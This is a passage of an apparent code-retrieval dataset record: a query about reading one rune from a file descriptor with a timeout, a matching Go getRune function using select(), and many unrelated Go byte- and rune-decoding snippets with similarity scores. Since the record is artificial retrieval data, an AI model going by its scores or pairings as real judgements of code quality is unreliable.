this.bitstream.ReadBit() == 1 {\n\t\t\tbreak\n\t\t}\n\n\t\tlog2++\n\t}\n\n\tif this.signed == true {\n\t\t// Decode signed: read value + sign\n\t\tval := this.bitstream.ReadBits(log2 + 1)\n\t\tres := val>>1 + 1<<log2 - 1\n\n\t\tif val&1 == 1 {\n\t\t\treturn byte(^res + 1)\n\t\t}\n\n\t\treturn byte(res)\n\t}\n\n\t// Decode unsigned\n\tval := this.bitstream.ReadBits(log2)\n\treturn byte((1 << log2) - 1 + val)\n}", "func (enc *Encoding) DecodedLen(n int) int {\n\treturn (n + 7) / 8 * 5\n}", "func (p *Lexer) PeekByte() byte {\n\tc, err := p.Byte()\n\n\tif err != nil {\n\t\treturn 0\n\t}\n\n\tp.UnreadByte()\n\treturn c\n}", "func (p *ubPayload) Decode(enc []byte) (graph.NodePayload, error) {\n\tin := string(enc)\n\tl := in[0] - charOffset\n\tflags, e := strconv.Atoi(in[1 : 1+l])\n\tif e != nil {\n\t\treturn nil, e\n\t}\n\tret := &ubPayload{flags: flags, suffix: in[1+l:]}\n\treturn ret, nil\n}", "func (b *Builder) AddUint8(v uint8) {\n\tb.add(byte(v))\n}", "func (field EnvChangePackageField) ByteLength() int {\n\t// type byte\n\t// + new value length byte + new value length\n\t// + old value length byte + old value length\n\treturn 3 + len(field.NewValue) + len(field.OldValue)\n}", "func (enc *Encoding) Decode(src []byte) ([]byte, error) {\n\tif len(src) == 0 {\n\t\treturn []byte{}, nil\n\t}\n\tvar zeros []byte\n\tfor i, c := range src {\n\t\tif c == enc.alphabet[0] && i < len(src)-1 {\n\t\t\tzeros = append(zeros, '0')\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\tn := new(big.Int)\n\tvar i int64\n\tfor _, c := range src {\n\t\tif i = enc.decodeMap[c]; i < 0 {\n\t\t\treturn nil, fmt.Errorf(\"invalid character '%c' in decoding a base58 string \\\"%s\\\"\", c, src)\n\t\t}\n\t\tn.Add(n.Mul(n, radix), big.NewInt(i))\n\t}\n\treturn n.Append(zeros, 10), nil\n}", "func (dd *dictDecoder) writeByte(c byte) {\n\tdd.hist[dd.wrPos] = c\n\tdd.wrPos++\n}", "func (b UnsignedByte) Decode(r io.Reader) (interface{}, error) {\n\ti, err := util.ReadUint8(r)\n\treturn UnsignedByte(i), err\n}", "func GetUint8(key string) uint8 {\n\treturn v.GetUint8(key)\n}", "func (Uint8Codec) Append(data []byte, ptr unsafe.Pointer) []byte {\n\treturn AppendVarUint(data, uint64(*(*uint8)(ptr)))\n}", "func (p *StringBuilder) AppendByte(byte byte) {\n\tp.buffer = append(p.buffer, byte)\n}", "func (m *Manager) ReadByte() byte {\n\treturn byte(m.readUint(8))\n}", "func decodeRune(s string) rune {\n\tif strings.HasPrefix(s, \"0x\") {\n\t\ti, err := strconv.ParseInt(s, 0, 16)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\treturn rune(i)\n\t}\n\n\tif !strings.HasPrefix(s, \"'\") || !strings.HasSuffix(s, \"'\") {\n\t\tpanic(fmt.Sprintf(\"expected character, got: %s\", s))\n\t}\n\n\tif len(s) == 4 {\n\t\tif s[1] != '\\\\' {\n\t\t\tpanic(fmt.Sprintf(\"expected escaped character, got: %s\", s))\n\t\t}\n\t\treturn rune(s[2])\n\t}\n\n\tif len(s) != 3 {\n\t\tpanic(fmt.Sprintf(\"expected character, got: %s\", s))\n\t}\n\n\treturn rune(s[1])\n}", "func hashAddByte(h uint64, b byte) uint64 {\n\th ^= uint64(b)\n\th *= prime64\n\treturn h\n}", "func (r *readRune) ReadRune() (rr rune, size int, err error) {\n\tif r.peekRune >= 0 {\n\t\trr = r.peekRune\n\t\tr.peekRune = ^r.peekRune\n\t\tsize = utf8.RuneLen(rr)\n\t\treturn\n\t}\n\tr.buf[0], err = r.readByte()\n\tif err != nil {\n\t\treturn\n\t}\n\tif r.buf[0] < utf8.RuneSelf { // fast check for common ASCII case\n\t\trr = rune(r.buf[0])\n\t\tsize = 1 // Known to be 1.\n\t\t// Flip the bits of the rune so it's available to UnreadRune.\n\t\tr.peekRune = ^rr\n\t\treturn\n\t}\n\tvar n int\n\tfor n = 1; !utf8.FullRune(r.buf[:n]); n++ {\n\t\tr.buf[n], err = r.readByte()\n\t\tif err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\terr = nil\n\t\t\t\tbreak\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t}\n\trr, size = utf8.DecodeRune(r.buf[:n])\n\tif size < n { // an error, save the bytes for the next read\n\t\tcopy(r.pendBuf[r.pending:], r.buf[size:n])\n\t\tr.pending += n - size\n\t}\n\t// Flip the bits of the rune so it's available to UnreadRune.\n\tr.peekRune = ^rr\n\treturn\n}", "func TestCheckBinaryExprRuneAddRune(t *testing.T) {\n\tenv := MakeSimpleEnv()\n\n\texpectConst(t, `'@' + '@'`, env, NewConstRune('@' + '@'), ConstRune)\n}", "func (s *Scanner) advance() rune {\n\tr, size := utf8.DecodeRune(s.source[s.current:])\n\ts.current = s.current + size\n\treturn r\n}", "func (in *InBuffer) ReadRune() rune {\n\tx, size := utf8.DecodeRune(in.Data[in.ReadPos:])\n\tin.ReadPos += size\n\treturn x\n}", "func (in *InBuffer) ReadRune() rune {\n\tx, size := utf8.DecodeRune(in.Data[in.ReadPos:])\n\tin.ReadPos += size\n\treturn x\n}", "func (r *DecReader) ReadByte() (byte, error) {\n\tif r.err != nil {\n\t\treturn 0, r.err\n\t}\n\tif r.firstRead {\n\t\tr.firstRead = false\n\t\tif _, err := r.readFragment(nil, 0); err != nil {\n\t\t\treturn 0, err\n\t\t}\n\t\tb := r.plaintextBuffer[0]\n\t\tr.offset = 1\n\t\treturn b, nil\n\t}\n\tif r.offset > 0 && r.offset < len(r.plaintextBuffer) {\n\t\tb := r.plaintextBuffer[r.offset]\n\t\tr.offset++\n\t\treturn b, nil\n\t}\n\tif r.closed {\n\t\treturn 0, io.EOF\n\t}\n\n\tr.offset = 0\n\tif _, err := r.readFragment(nil, 1); err != nil {\n\t\treturn 0, err\n\t}\n\tb := r.plaintextBuffer[0]\n\tr.offset = 1\n\treturn b, nil\n}", "func (a *ALU) PushByte(byte uint8) {\n\ta.StackPtr++\n\ta.InternalRAM[a.StackPtr] = byte\n}", "func (v *Venom) GetUint8(key string) uint8 {\n\tval, ok := v.Find(key)\n\tif !ok {\n\t\treturn 0\n\t}\n\n\tif value, ok := val.(uint8); !ok {\n\t\treturn 0\n\t} else {\n\t\treturn value\n\t}\n}", "func lc(b byte) byte {\n\treturn b | 0x20\n}", "func Uint8StringSize(v uint8) uint8 {\n\tswitch true {\n\tcase v > 99:\n\t\treturn 3\n\tcase v > 9:\n\t\treturn 2\n\tdefault:\n\t\treturn 1\n\t}\n}", "func Decode(str string) string {\n\trs := []rune(str)\n\tvar b []uint8\n\tfor _, r := range rs {\n\t\tb1 := r & ((1 << 8) - 1)\n\t\tb = append(b, uint8(b1))\n\n\t\tb2val := r - b1\n\t\tif b2val != unknownByteCodePoint {\n\t\t\tb2 := decodeMap[b2val]\n\t\t\tb = append(b, b2)\n\t\t}\n\t}\n\ts := string(b)\n\treturn s\n}", "func (z *Tokenizer) nextByte() byte {\n\tif z.err == io.EOF {\n\t\treturn 0\n\t}\n\tby, err := z.r.ReadByte()\n\tif err == io.EOF {\n\t\tz.err = io.EOF\n\t\treturn 0\n\t} else if err != nil {\n\t\tpanic(err)\n\t}\n\treturn by\n}", "func readByte(r io.Reader) (uint8, error) {\n\ttmp := []uint8{0}\n\t_, e := r.Read(tmp)\n\treturn tmp[0], e\n}", "func AppendByte(slice []byte, data ...byte) []byte {\n\tm := len(slice)\n\tn := m + len(data)\n\tif n > cap(slice) { // if necessary, reallocate\n\t\t// allocate double what's needed, for future growth.\n\t\tnewSlice := make([]byte, (n+1)*2)\n\t\tcopy(newSlice, slice)\n\t\tslice = newSlice\n\t}\n\tslice = slice[0:n]\n\tcopy(slice[m:n], data)\n\treturn slice\n}", "func utf16utf8(b []byte, o binary.ByteOrder) []byte {\n\tutf := make([]uint16, (len(b)+(2-1))/2)\n\tfor i := 0; i+(2-1) < len(b); i += 2 {\n\t\tutf[i/2] = o.Uint16(b[i:])\n\t}\n\tif len(b)/2 < len(utf) {\n\t\tutf[len(utf)-1] = utf8.RuneError\n\t}\n\treturn []byte(string(utf16.Decode(utf)))\n}", "func GetByte(r io.Reader) (byte, error) {\n\tt := make([]byte, 1)\n\t_, err := r.Read(t)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\n\treturn t[0], nil\n}", "func (enc *Encoding) DecodedLen(n int) int {\n\treturn n * bitsPerChar / bitsPerByte\n}", "func (s *scratch) add(c byte) {\n\tif s.fill+1 >= cap(s.data) {\n\t\ts.grow()\n\t}\n\n\ts.data[s.fill] = c\n\ts.fill++\n}", "func (c *Validator) GetUint8(key string, def ...uint8) (uint8, error) {\n\tstrv := c.Input.Query(key)\n\tif len(strv) == 0 && len(def) > 0 {\n\t\treturn def[0], nil\n\t}\n\tu64, err := strconv.ParseUint(strv, 10, 8)\n\treturn uint8(u64), err\n}", "func (b *Buffer) AppendUint8(v uint8) {\n\tb.AppendUint64(uint64(v))\n}", "func execDecodeLastRune(_ int, p *gop.Context) {\n\targs := p.GetArgs(1)\n\tret, ret1 := utf8.DecodeLastRune(args[0].([]byte))\n\tp.Ret(1, ret, ret1)\n}", "func UnicodeDecodeWithOffsetsReplacementChar(value int64) UnicodeDecodeWithOffsetsAttr {\n\treturn func(m optionalAttr) {\n\t\tm[\"replacement_char\"] = value\n\t}\n}", "func (b Byte) Decode(r io.Reader) (interface{}, error) {\n\ti, err := util.ReadInt8(r)\n\treturn Byte(i), err\n}", "func (a *ALU) PopByte() byte {\n\tb := a.InternalRAM[a.StackPtr]\n\ta.StackPtr--\n\treturn b\n}", "func execDecodeLastRuneInString(_ int, p *gop.Context) {\n\targs := p.GetArgs(1)\n\tret, ret1 := utf8.DecodeLastRuneInString(args[0].(string))\n\tp.Ret(1, ret, ret1)\n}", "func getLastChar(s string) byte {\n\treturn s[len(s)-1]\n}", "func GetCharWrapped() byte {\n var singleChar byte;\n if tok.nextChar == 0 { \n singleChar = libgogo.GetChar(fileInfo[curFileIndex].fd);\n if (singleChar == 10) {\n fileInfo[curFileIndex].charCounter = 1;\n fileInfo[curFileIndex].lineCounter = fileInfo[curFileIndex].lineCounter + 1;\n } else {\n fileInfo[curFileIndex].charCounter = fileInfo[curFileIndex].charCounter + 1;\n }\n } else {\n singleChar = tok.nextChar;\n tok.nextChar = 0;\n }\n\n return singleChar;\n}", "func (b *Buffer) AppendByte(v byte) {\n\tb.buf = append(b.buf, v)\n}", "func (p Payload) GetByte(key string) (byte, error) {\n\tvalue, err := p.Get(key)\n\tif err != nil {\n\t\treturn 0, err\n\t}\n\tif value, ok := value.(byte); ok {\n\t\treturn value, nil\n\t}\n\treturn 0, fmt.Errorf(\"Value with key '%s' not a byte\", key)\n}", "func (c *Controller) GetUint8(key string, def ...uint8) (uint8, error) {\n\tstrv := c.Ctx.Input.Query(key)\n\tif len(strv) == 0 && len(def) > 0 {\n\t\treturn def[0], nil\n\t}\n\tu64, err := strconv.ParseUint(strv, 10, 8)\n\treturn uint8(u64), err\n}", "func (d *decoder81) peekValueByteLen(tt *vdl.Type) (int, error) {\n\tif hasChunkLen(tt) {\n\t\t// Use the explicit message length.\n\t\treturn d.buf.lim, nil\n\t}\n\t// No explicit message length, but the length can be computed.\n\tswitch {\n\tcase tt.Kind() == vdl.Array && tt.IsBytes():\n\t\t// Byte arrays are exactly their length and encoded with 1-byte header.\n\t\treturn tt.Len() + 1, nil\n\tcase tt.Kind() == vdl.String || tt.IsBytes():\n\t\t// Strings and byte lists are encoded with a length header.\n\t\tstrlen, bytelen, err := binaryPeekUint(d.buf)\n\t\tswitch {\n\t\tcase err != nil:\n\t\t\treturn 0, err\n\t\tcase strlen > maxBinaryMsgLen:\n\t\t\treturn 0, errMsgLen(maxBinaryMsgLen)\n\t\t}\n\t\treturn int(strlen) + bytelen, nil\n\tdefault:\n\t\t// Must be a primitive, which is encoded as an underlying uint.\n\t\treturn binaryPeekUintByteLen(d.buf)\n\t}\n}", "func (s String) Size() int { return binary.Size(s) }", "func (m *Message) putUint8(v uint8) {\n\tb := m.bufferForPut(1)\n\tdefer b.Advance(1)\n\n\tb.Bytes[b.Offset] = v\n}", "func (d *Decoder) Byte() byte {\n\tb, err := d.buf.ReadByte()\n\tif err != nil {\n\t\tpanic(\"unmarshalByte\")\n\t}\n\treturn b\n}" ]
[ "0.62522995", "0.6023888", "0.575294", "0.5561606", "0.55129707", "0.5300394", "0.52845013", "0.52588093", "0.5219854", "0.5210699", "0.5197407", "0.5191365", "0.5188205", "0.5158537", "0.5146117", "0.50871277", "0.5043505", "0.5022171", "0.49819675", "0.49794295", "0.49604732", "0.4949368", "0.4941412", "0.49330962", "0.492855", "0.49259588", "0.4924224", "0.4920306", "0.4908762", "0.4904626", "0.48706383", "0.48598173", "0.48548743", "0.48409507", "0.4838059", "0.4818999", "0.48181152", "0.47943547", "0.47907734", "0.4785784", "0.47801304", "0.477997", "0.4778591", "0.47757795", "0.47648233", "0.47628295", "0.47594494", "0.47593823", "0.47573596", "0.47568333", "0.47543797", "0.47536704", "0.47498974", "0.47475976", "0.4740609", "0.47353768", "0.47341907", "0.4731052", "0.4729769", "0.47246793", "0.47234714", "0.47177625", "0.47144192", "0.47144172", "0.47079796", "0.47037432", "0.46952108", "0.46938992", "0.46936196", "0.4678318", "0.4678318", "0.46776012", "0.46772665", "0.46752992", "0.46687743", "0.46637955", "0.46590036", "0.46569872", "0.4655382", "0.46549034", "0.46513328", "0.46497482", "0.46479923", "0.4644579", "0.4644363", "0.46434003", "0.46432516", "0.4640974", "0.4635615", "0.46331698", "0.46219575", "0.46165487", "0.46141118", "0.46006015", "0.46004364", "0.45999447", "0.45966038", "0.45929506", "0.45926207", "0.4589618" ]
0.7119522
0
read a single rune from a file descriptor (with timeout) timeout >= 0 : wait for timeout seconds timeout = nil : return immediately
func (u *utf8) getRune(fd int, timeout *syscall.Timeval) rune { // use select() for the timeout if timeout != nil { for true { rd := syscall.FdSet{} fdset.Set(fd, &rd) n, err := syscall.Select(fd+1, &rd, nil, nil, timeout) if err != nil { continue } if n == 0 { // nothing is readable return KeycodeNull } break } } // Read the file descriptor buf := make([]byte, 1) _, err := syscall.Read(fd, buf) if err != nil { panic(fmt.Sprintf("read error %s\n", err)) } // decode the utf8 r, size := u.add(buf[0]) if size == 0 { // incomplete utf8 code point return KeycodeNull } if size == 1 && r == unicode.ReplacementChar { // utf8 decode error return KeycodeNull } return r }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (r *timeoutReadCloser) Read(b []byte) (int, error) {\n\ttimer := time.NewTimer(r.duration)\n\tc := make(chan readResult, 1)\n\n\tgo func() {\n\t\tn, err := r.reader.Read(b)\n\t\ttimer.Stop()\n\t\tc <- readResult{n: n, err: err}\n\t}()\n\n\tselect {\n\tcase data := <-c:\n\t\treturn data.n, data.err\n\tcase <-timer.C:\n\t\treturn 0, &ResponseTimeoutError{TimeoutDur: r.duration}\n\t}\n}", "func readTimeout(c <-chan Event, ms uint) (Event, error) {\n\tselect {\n\tcase ev := <-c:\n\t\treturn ev, nil\n\tcase <-time.After(time.Duration(ms) * time.Millisecond):\n\t\treturn Event{}, errChanTimeout\n\t}\n}", "func TimeoutReader(r io.Reader) io.Reader { return &timeoutReader{r, 0} }", "func (f *firstLineReader) getLine(timeout time.Duration) (string, error) {\n\tselect {\n\tcase s := <-f.sch:\n\t\treturn s, nil\n\tcase err := <-f.ech:\n\t\treturn err.Error(), err\n\tcase <-time.After(timeout):\n\t\terr := errors.New(\"read timed out\")\n\t\treturn err.Error(), err\n\t}\n}", "func (d *Dev) ReadTimeout(timeout time.Duration) (int32, error) {\n\t// Wait for the falling edge that indicates the ADC has data.\n\td.mu.Lock()\n\tdefer d.mu.Unlock()\n\tif !d.IsReady() {\n\t\tif !d.data.WaitForEdge(timeout) {\n\t\t\treturn 0, ErrTimeout\n\t\t}\n\t}\n\treturn d.readRaw()\n}", "func (dev *Device) read() {\n\tif !dev.Ok {\n\t\t// log.Printf(\"Device is closed === %s\", dev)\n\t\treturn\n\t}\n\tdev.chRecv = make(chan []byte)\n\tgo func() {\n\t\tdefer func() {\n\t\t\tselect {\n\t\t\tcase _, ok := <-dev.chRecv:\n\t\t\t\tif !ok {\n\t\t\t\t\t// log.Println(\"=== chRecv closed ===\")\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t}\n\t\t\tclose(dev.chRecv)\n\t\t\tlog.Println(\"finish read port\")\n\t\t}()\n\t\tcountError := 0\n\t\t//TODO timeoutRead?\n\t\tfuncerr := func(err error) error {\n\t\t\tif err == nil {\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\tlog.Printf(\"funcread err: %s\", err)\n\t\t\tswitch {\n\t\t\tcase errors.Is(err, os.ErrClosed):\n\t\t\t\tdev.Ok = false\n\t\t\t\treturn err\n\t\t\tcase errors.Is(err, io.ErrClosedPipe):\n\t\t\t\tdev.Ok = false\n\t\t\t\treturn err\n\t\t\tcase errors.Is(err, io.EOF):\n\t\t\t\tif countError > 3 {\n\t\t\t\t\tif !dev.Ok {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tcountError = 0\n\t\t\t\t}\n\t\t\t\tcountError++\n\t\t\t}\n\n\t\t\treturn nil\n\n\t\t\t// if countError > 3 {\n\t\t\t// dev.Ok = false\n\t\t\t// return err\n\t\t\t// }\n\t\t\t// time.Sleep(1 * time.Second)\n\t\t\t// countError++\n\t\t\t// return nil\n\t\t}\n\t\tbf := bufio.NewReader(dev.port)\n\t\ttempb := make([]byte, 1024)\n\t\t// buff := make([]byte, 1)\n\t\tindxb := 0\n\t\tfor {\n\t\t\tif !dev.Ok {\n\t\t\t\t// log.Printf(\"Device is closed === %s ######\", dev)\n\t\t\t\treturn\n\t\t\t}\n\t\t\t// log.Println(\"0\")\n\t\t\t// if dev.mode != 0 {\n\t\t\t// \tline, _, err := bf.ReadLine()\n\t\t\t// \tif err != nil {\n\t\t\t// \t\tif err := funcerr(err); err != nil {\n\t\t\t// \t\t\treturn\n\t\t\t// \t\t}\n\t\t\t// \t\tcontinue\n\t\t\t// \t}\n\t\t\t// \tcountError = 0\n\t\t\t// \tselect {\n\t\t\t// \tcase <-dev.chQuit:\n\t\t\t// \t\treturn\n\t\t\t// \tcase dev.chRecv <- line:\n\t\t\t// \tcase <-time.After(1 * time.Second):\n\t\t\t// \t}\n\t\t\t// \tcontinue\n\t\t\t// }\n\t\t\tb, err := bf.ReadByte()\n\t\t\tif err != nil {\n\t\t\t\tif err := funcerr(err); err != nil {\n\t\t\t\t\t// log.Printf(\"0, err: %s\", err)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// var b byte\n\t\t\t// if n > 0 {\n\t\t\t// \tb = buff[0]\n\t\t\t// } else {\n\t\t\t// \tcontinue\n\t\t\t// }\n\t\t\t// log.Printf(\"0, err: %s, [% X]\", err, buff[:n])\n\t\t\t// if err != nil {\n\t\t\tif err := funcerr(err); err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tif indxb <= 0 {\n\t\t\t\tif b == '\\x02' {\n\t\t\t\t\ttempb[0] = b\n\t\t\t\t\tindxb = 1\n\t\t\t\t}\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\ttempb[indxb] = b\n\t\t\tindxb++\n\t\t\t// fmt.Printf(\"len: %v, %v\\n\", indxb, int(tempb[2])+5)\n\t\t\tif indxb < 6 {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\t// log.Println(\"2\")\n\t\t\tif b == '\\x03' && (indxb >= int(tempb[2])+5) {\n\t\t\t\t// fmt.Printf(\"tempb final: [% X]\\n\", tempb[:indxb])\n\t\t\t\tselect {\n\t\t\t\tcase <-dev.chQuit:\n\t\t\t\t\t// log.Println(\"3\")\n\t\t\t\t\treturn\n\t\t\t\tcase dev.chRecv <- tempb[0:indxb]:\n\t\t\t\t\t// fmt.Printf(\"tempb final: [% X]\\n\", tempb[:])\n\t\t\t\tcase <-time.After(1 * time.Second):\n\t\t\t\t}\n\t\t\t\tindxb = 0\n\t\t\t}\n\t\t}\n\t}()\n\tlog.Println(\"reading port\")\n}", "func (s *Scanner) read() rune {\n\tch, _, err := s.r.ReadRune()\n\tif err != nil {\n\t\treturn eof\n\t}\n\treturn ch\n}", "func (s *Scanner) read() rune {\n\tch, _, err := s.r.ReadRune()\n\tif err != nil {\n\t\treturn eof\n\t}\n\treturn ch\n}", "func (l *Lexer) read() rune {\n\tl.Reset()\n\n\tl.length, _ = l.reader.Read(l.buffer)\n\n\tif l.length == 0 {\n\t\treturn EOF\n\t}\n\n\treturn l.Next()\n}", "func (r byteAtATimeReader) Read(out []byte) (int, error) {\n\treturn r.Reader.Read(out[:1])\n}", "func (s *Scanner) read() rune {\n\tch, _, err := s.reader.ReadRune()\n\tif err != nil {\n\t\treturn eof\n\t}\n\treturn ch\n}", "func (s *Sniffer) Recv(t *testing.T, timeout time.Duration) []byte {\n\tt.Helper()\n\n\tdeadline := time.Now().Add(timeout)\n\tfor {\n\t\ttimeout = time.Until(deadline)\n\t\tif timeout <= 0 {\n\t\t\treturn nil\n\t\t}\n\t\tusec := timeout.Microseconds()\n\t\tif usec == 0 {\n\t\t\t// Timeout is less than a microsecond; set usec to 1 to avoid\n\t\t\t// blocking indefinitely.\n\t\t\tusec = 1\n\t\t}\n\t\tconst microsInOne = 1e6\n\t\ttv := unix.Timeval{\n\t\t\tSec: usec / microsInOne,\n\t\t\tUsec: usec % microsInOne,\n\t\t}\n\t\tif err := unix.SetsockoptTimeval(s.fd, unix.SOL_SOCKET, unix.SO_RCVTIMEO, &tv); err != nil {\n\t\t\tt.Fatalf(\"can't setsockopt SO_RCVTIMEO: %s\", err)\n\t\t}\n\n\t\tbuf := make([]byte, maxReadSize)\n\t\tnread, _, err := unix.Recvfrom(s.fd, buf, unix.MSG_TRUNC)\n\t\tif err == unix.EINTR || err == unix.EAGAIN {\n\t\t\t// There was a timeout.\n\t\t\tcontinue\n\t\t}\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"can't read: %s\", err)\n\t\t}\n\t\tif nread > maxReadSize {\n\t\t\tt.Fatalf(\"received a truncated frame of %d bytes, want at most %d bytes\", nread, maxReadSize)\n\t\t}\n\t\treturn buf[:nread]\n\t}\n}", "func readRune(r *bufio.Reader) (rune, error) {\n\tr1, _, err := r.ReadRune()\n\n\t// handle \\r\\n\n\tif r1 == '\\r' {\n\t\tr1, _, err = r.ReadRune()\n\t\tif err != nil {\n\t\t\tif r1 != '\\n' {\n\t\t\t\tr.UnreadRune()\n\t\t\t\tr1 = '\\r'\n\t\t\t}\n\t\t}\n\t}\n\treturn r1, err\n}", "func (r *readRune) ReadRune() (rr rune, size int, err error) {\n\tif r.peekRune >= 0 {\n\t\trr = r.peekRune\n\t\tr.peekRune = ^r.peekRune\n\t\tsize = utf8.RuneLen(rr)\n\t\treturn\n\t}\n\tr.buf[0], err = r.readByte()\n\tif err != nil {\n\t\treturn\n\t}\n\tif r.buf[0] < utf8.RuneSelf { // fast check for common ASCII case\n\t\trr = rune(r.buf[0])\n\t\tsize = 1 // Known to be 1.\n\t\t// Flip the bits of the rune so it's available to UnreadRune.\n\t\tr.peekRune = ^rr\n\t\treturn\n\t}\n\tvar n int\n\tfor n = 1; !utf8.FullRune(r.buf[:n]); n++ {\n\t\tr.buf[n], err = r.readByte()\n\t\tif err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\terr = nil\n\t\t\t\tbreak\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t}\n\trr, size = utf8.DecodeRune(r.buf[:n])\n\tif size < n { // an error, save the bytes for the next read\n\t\tcopy(r.pendBuf[r.pending:], r.buf[size:n])\n\t\tr.pending += n - size\n\t}\n\t// Flip the bits of the rune so it's available to UnreadRune.\n\tr.peekRune = ^rr\n\treturn\n}", "func (s *Scanner) read() rune {\n\tif len(s.peekRunes) > 0 {\n\t\tr := s.peekRunes[0]\n\t\ts.peekRunes = s.peekRunes[1:]\n\t\treturn r\n\t}\n\treturn s.nextRune()\n}", "func (p *port) Read(b []byte) (n int, err error) {\n\tvar rfds syscall.FdSet\n\n\tfd := int(p.file.Fd())\n\tfdSet(fd, &rfds)\n\n\tvar tv *syscall.Timeval\n\tif p.timeout > 0 {\n\t\ttimeout := syscall.NsecToTimeval(p.timeout.Nanoseconds())\n\t\ttv = &timeout\n\t}\n\tif _, err = syscall.Select(fd+1, &rfds, nil, nil, tv); err != nil {\n\t\terr = fmt.Errorf(\"serial: could not select: %v\", err)\n\t\treturn\n\t}\n\tif !fdIsSet(fd, &rfds) {\n\t\t// Timeout\n\t\terr = ErrTimeout\n\t\treturn\n\t}\n\tn, err = p.file.Read(b)\n\treturn\n}", "func reader(ch chan int) {\n \n t := time.NewTimer(10*time.Second)\n \n for {\n select {\n case i := <- ch: //if something comes from the the channel this case will print it otherwise carry on\n fmt.Printf(\"%d\\n\", i)\n \n case <-t.C :\n ch = nil //when this case heppens after 3 seconds the goroutine will stop and wait\n }\n }\n}", "func (i *UI) read(opts *readOptions) (string, error) {\n\ti.once.Do(i.setDefault)\n\n\t// sigCh is channel which is watch Interruptted signal (SIGINT)\n\tsigCh := make(chan os.Signal, 1)\n\tsignal.Notify(sigCh, os.Interrupt)\n\tdefer signal.Stop(sigCh)\n\n\tvar resultStr string\n\tvar resultErr error\n\tdoneCh := make(chan struct{})\n\n\tgo func() {\n\t\tdefer close(doneCh)\n\n\t\tif opts.mask {\n\t\t\tf, ok := i.Reader.(*os.File)\n\t\t\tif !ok {\n\t\t\t\tresultErr = fmt.Errorf(\"reader must be a file\")\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\ti.mask, i.maskVal = opts.mask, opts.maskVal\n\t\t\tresultStr, resultErr = i.rawRead(f)\n\t\t} else {\n\t\t\tline, err := i.bReader.ReadString('\\n')\n\t\t\tif err != nil && err != io.EOF {\n\t\t\t\tresultErr = fmt.Errorf(\"failed to read the input: %s\", err)\n\t\t\t}\n\n\t\t\tresultStr = strings.TrimSuffix(line, \"\\n\")\n\t\t}\n\t}()\n\n\tselect {\n\tcase <-sigCh:\n\t\treturn \"\", ErrInterrupted\n\tcase <-doneCh:\n\t\treturn resultStr, resultErr\n\t}\n}", "func (s *Scanner) read() rune {\n\t// If we have runes on our internal lookahead buffer then return those.\n\tif s.bufn > 0 {\n\t\ts.bufi = ((s.bufi + 1) % len(s.buf))\n\t\ts.bufn--\n\t\treturn s.buf[s.bufi]\n\t}\n\n\t// Otherwise read from the reader.\n\tch, _, err := s.rd.ReadRune()\n\tpos := s.pos()\n\tif err != nil {\n\t\tch = eof\n\t} else {\n\t\t// Preprocess the input stream by replacing FF with LF\n\t\tif ch == '\\f' {\n\t\t\tch = '\\n'\n\t\t}\n\n\t\t// Preprocess the input stream by replacing CR and CRLF with LF\n\t\tif ch == '\\r' {\n\t\t\tif ch, _, err := s.rd.ReadRune(); err != nil {\n\t\t\t\t// nop\n\t\t\t} else if ch != '\\n' {\n\t\t\t\ts.unread(1)\n\t\t\t}\n\t\t\tch = '\\n'\n\t\t}\n\n\t\t// Track scanner position.\n\t\tif ch == '\\n' {\n\t\t\tpos.Line++\n\t\t\tpos.Char = 0\n\t\t} else {\n\t\t\tpos.Char++\n\t\t}\n\t}\n\n\t// Add to circular buffer.\n\ts.bufi = ((s.bufi + 1) % len(s.buf))\n\ts.buf[s.bufi] = ch\n\ts.bufpos[s.bufi] = pos\n\treturn ch\n}", "func (t *testReader) Read(p []byte) (n int, err error) {\n\tif t.n <= 0 {\n\t\treturn 0, io.EOF\n\t}\n\ttime.Sleep(t.delay)\n\tp[0] = 'A'\n\tt.Lock()\n\tt.n--\n\tt.Unlock()\n\treturn 1, nil\n}", "func (dev *Device) Recv(timeout time.Duration) ([]byte, error) {\n\n\tctx, cancel := context.WithTimeout(context.TODO(), timeout)\n\tdefer cancel()\n\n\treturn dev.read(ctx, false)\n}", "func (r *readRune) readByte() (b byte, err error) {\n\tif r.pending > 0 {\n\t\tb = r.pendBuf[0]\n\t\tcopy(r.pendBuf[0:], r.pendBuf[1:])\n\t\tr.pending--\n\t\treturn\n\t}\n\tn, err := io.ReadFull(r.reader, r.pendBuf[:1])\n\tif n != 1 {\n\t\treturn 0, err\n\t}\n\treturn r.pendBuf[0], err\n}", "func (term *Terminal) read(in *bufio.Reader) (int, rune, error) {\n\tchar, _, err := in.ReadRune()\n\tif err != nil {\n\t\treturn 0, 0, err\n\t}\n\n\tswitch char {\n\tdefault:\n\t\t// Standard chars.\n\t\treturn evChar, char, nil\n\t\t// Next\n\tcase ctrlN:\n\t\treturn evDown, char, nil\n\t\t// Prev\n\tcase ctrlP:\n\t\treturn evUp, char, nil\n\tcase tabKey, ctrlA, ctrlB, ctrlE, ctrlF, ctrlG, ctrlH, ctrlJ, ctrlK,\n\t\tctrlO, ctrlQ, ctrlR, ctrlS, ctrlT, ctrlU, ctrlV, ctrlW, ctrlX,\n\t\tctrlY, ctrlZ:\n\t\t// Skip.\n\t\treturn evSkip, char, nil\n\tcase returnKey:\n\t\t// End of line.\n\t\treturn evReturn, char, nil\n\tcase ctrlD:\n\t\t// End of file.\n\t\treturn evEOF, char, nil\n\tcase ctrlC:\n\t\t// End of line, interrupted.\n\t\treturn evCtrlC, char, nil\n\tcase backKey:\n\t\t// Backspace.\n\t\treturn evBack, char, 